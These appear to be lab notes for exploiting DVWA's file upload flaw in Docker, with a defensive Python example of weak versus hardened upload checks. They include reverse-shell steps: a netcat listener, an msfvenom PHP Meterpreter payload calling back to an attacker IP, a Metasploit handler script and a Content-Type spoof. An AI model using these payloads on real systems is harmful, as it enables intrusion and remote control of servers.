DVWA Notes

Fix file upload vuln on DVWA Docker container

By default, the container's file permissions are not set up for the file upload vulnerability to work properly with something like a PHP backdoor.

To fix this, pop onto the container:

docker exec -i -t <name of the container> /bin/bash

Once you're on, run this command:

chown -R www-data:www-data /app

At this point, you should be able to upload a backdoor like Laudanum and go to town like so (once you've uploaded the backdoor):

# Start a listener for the reverse shell on the IP you set in the Laudanum source
netcat -lvp <port you've set in the source>

Alternatively you can use meterpreter by spawning a reverse shell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<attackers ip> LPORT=4444 -f raw > met_shell.php

Followed by creating a listener (drop this code into evil.rc):

use multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST <attackers ip>
set LPORT 4444
exploit -j -z

and run it:

msfconsole -r evil.rc

Follow this up by uploading met_shell.php and triggering it by requesting the uploaded file under:

http://127.0.0.1:<whatever port you've mapped>/hackable/uploads/
  • Note that this will work only when the security level is set to Low

To make this work with the security level set to Medium, you'll need Burp Suite to intercept the upload request. Once you've intercepted the request, change the Content-Type to:

image/jpeg
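
Why the Content-Type change gets through, as an added example (not DVWA's code and not part of the original notes): a check that trusts the Content-Type the client declares, next to one that decides from the file name and the bytes actually received. The function names and the sample uploads are constructed for illustration.

```python
import os

# Allow-list: extension -> magic bytes the file body must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}


def weak_check(filename, declared_type, body):
    """Trusts the part's Content-Type header, which is set by the client."""
    return declared_type in ("image/jpeg", "image/png")


def hardened_check(filename, declared_type, body):
    """Ignores the declared type; decides from the name and the received bytes."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    stem, ext = os.path.splitext(name)
    # Conservative: exactly one extension, and it must be on the allow-list.
    if not stem or "." in stem or ext not in ALLOWED:
        return False
    return body.startswith(ALLOWED[ext])


def stored_name(ext):
    """Server-chosen random name, so the client never controls the stored path."""
    return os.urandom(16).hex() + ext


# Constructed samples: (filename, declared Content-Type, first bytes of the body).
SAMPLES = [
    ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ("met_shell.php", "application/x-php", b"<?php /* placeholder */"),
    # Same file with only the declared type edited in an intercepting proxy.
    ("met_shell.php", "image/jpeg", b"<?php /* placeholder */"),
]


def compare():
    """Return (filename, weak verdict, hardened verdict) for each sample."""
    return [(n, weak_check(n, t, b), hardened_check(n, t, b)) for n, t, b in SAMPLES]


if __name__ == "__main__":
    for row in compare():
        print(row)
```

Magic bytes only show how a file starts, so serving uploads from a directory where PHP execution is disabled remains the stronger control.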

Resources

https://www.youtube.com/watch?v=4lFCQGkcD7M&t=7s